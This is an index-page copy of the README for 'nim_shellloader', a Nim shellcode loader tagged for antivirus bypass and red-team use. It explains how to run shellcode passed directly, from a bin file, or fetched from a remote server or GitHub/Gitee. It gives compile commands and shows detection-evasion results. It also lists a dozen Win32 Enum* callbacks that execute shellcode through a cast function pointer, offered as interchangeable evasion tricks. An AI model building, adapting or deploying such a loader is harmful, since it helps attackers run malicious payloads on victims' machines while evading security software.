Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/sh3d0ww01f/nim_shellloader
nim,免杀,红队,shellcode,bypass,apt,bypass-av.
https://github.com/sh3d0ww01f/nim_shellloader
bypass-antivirus nim nim-lang shellcode-loader
Last synced: about 2 months ago
JSON representation
nim,免杀,红队,shellcode,bypass,apt,bypass-av.
- Host: GitHub
- URL: https://github.com/sh3d0ww01f/nim_shellloader
- Owner: sh3d0ww01f
- Created: 2021-11-15T14:21:43.000Z (about 3 years ago)
- Default Branch: master
- Last Pushed: 2023-02-14T14:32:58.000Z (almost 2 years ago)
- Last Synced: 2024-08-05T17:39:37.917Z (5 months ago)
- Topics: bypass-antivirus, nim, nim-lang, shellcode-loader
- Language: Nim
- Homepage:
- Size: 3.89 MB
- Stars: 197
- Watchers: 3
- Forks: 34
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - sh3d0ww01f/nim_shellloader - nim,免杀,红队,shellcode,bypass,apt,bypass-av. (Nim)
README
# nim_shellloader
详见以下:
details:
# usage
```
loader.exe payload.bin
loader.exe (yourshellcode)
loader.exe (http://xxxx/xxx)
```
put your url/bin/shellcode direct
后面直接跟shellcode内容 或者bin文件名 或者网址就行①use shellcode:
![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/1.gif)
②use bin file
使用bin文件加载shellcode
![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/2.gif)
③ load the shellcode which on your server(remote load)
加载你服务器上的shellcode![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/3.gif)
Besides,You can load shellcode which on your reposiotory(gitee,github,etc.) like this
此外 你还可以把shellcode放在github,gitee的地方让loader去读
![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/4.png)
Notice:You must remove '\x' on your shellcode
注意:你必须去除你shellcode中的 \x
![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/5.png)
查杀情况
![](https://github.com/sh3d0ww01f/nim_shellloader/blob/master/image/6.png)
# 编译 compile
step1: setup require 安装所需的库
```
nimble install https://github.com/khchen/winim
nimble install https://github.com/status-im/nim-stew
```
step2: generate exe 生成exe
```
nim c --cpu:i386 -d:mingw -d:ssl --opt:size shellcode_loader.nim
```
# Advise 建议
windows上编译容易出现玄学问题 可以用debian11交叉编译 不过记得要装mingwIt's easy to have problem if you compile it on Windows Platform.In my opion,you'd better compile it on Linux
如果出现 :```could not load:(libcrypto-1_1|libeay32).dll```
If Go wrong with :```could not load:(libcrypto-1_1|libeay32).dll```考虑是运行的平台问题 因为编译的时候i386是x86的 所以出现这个问题就把i386换成amd64
I consider this is because of the wrong command(it didn't match target's platform ),so please change "i386" to "amd64",like following
```
nim c --cpu:amd64 -d:mingw -d:ssl --opt:size shellcode_loader.nim
```If it is compiled on windows, you don't need to add ```-d:mingw```
如果是windows上编译 则可以不用加```-d:mingw```
## 你可能会在运行这个加载器上出现问题 如果你出现
## It's possible that the shellcode_loader will go wrong with:
could not load: (libcrypto-1_1-x64|libeay64).dll
你可能需要解决这些库That means you maybe need to solve these dll
```
libcrypto-1_1-x64.dlllibenchant.dll
libpq.dll
libsasl.dll
libsodium.dll
libssh2.dll
libssl-1_1-x64.dll
```
You can find them under the floder which belong to PHP这些库可以在windows下 php环境中找到
Also , you can download them on the Internet
也可以从网上下载## 源码中的EnumSystemGeoID回调函数可以换成以下函数 等价
## The callback function named "EnumSystemGeoID" in my source can be replaced with following function
```
# Callback execution
EnumSystemGeoID(GEOCLASS_NATION,0,cast[GEO_ENUMPROC](rPtr)) #①
EnumChildWindows(cast[HWND](nil),cast[WNDENUMPROC](rPtr),cast[LPARAM](nil))#②
EnumDateFormatsA(cast[DATEFMT_ENUMPROCA](rPtr) , LOCALE_SYSTEM_DEFAULT, cast[DWORD](0))#③
EnumDesktopsW(GetProcessWindowStation(),cast[DESKTOPENUMPROCW](rPtr), cast[LPARAM](nil))#④
EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()),cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#⑤
EnumSystemCodePagesA(cast[CODEPAGE_ENUMPROCA](rPtr) ,0)#⑥
EnumSystemCodePagesW(cast[CODEPAGE_ENUMPROCW](rPtr), CP_INSTALLED)#⑦
EnumSystemLanguageGroupsA(cast[LANGUAGEGROUP_ENUMPROCA](rPtr),LGRPID_SUPPORTED,0)#⑧
EnumSystemLocalesA(cast[LOCALE_ENUMPROCA](rPtr) ,nil)#⑨
EnumThreadWindows(0,csat[WNDENUMPROC](rPtr),0) #⑩
EnumUILanguagesA(cast[UILANGUAGE_ENUMPROCA](rPtr), MUI_LANGUAGE_ID, 0)#11
EnumWindows(cast[WNDENUMPROC](rPtr), cast[LPARAM](nil))#12
```